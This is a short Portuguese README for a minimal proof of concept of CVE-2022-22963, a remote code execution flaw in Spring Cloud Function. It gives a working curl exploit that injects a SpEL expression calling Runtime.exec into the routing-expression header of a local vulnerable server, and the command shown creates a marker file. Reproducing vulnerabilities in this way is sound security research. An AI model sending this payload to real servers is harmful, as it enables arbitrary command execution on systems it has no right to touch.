
Prova de conceito mínima para CVE-2022-22963 execução remota de código no Spring Cloud Function via injeção de SpEL. Demonstra exploração com curl e um servidor vulnerável.
Exemplo mínimo para reproduzir a execução remota de código da CVE-2022-22963 em org.springframework.cloud:spring-cloud-function-core.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
Como resultado do exploit, o arquivo PWNED será criado ao lado de pom.xml.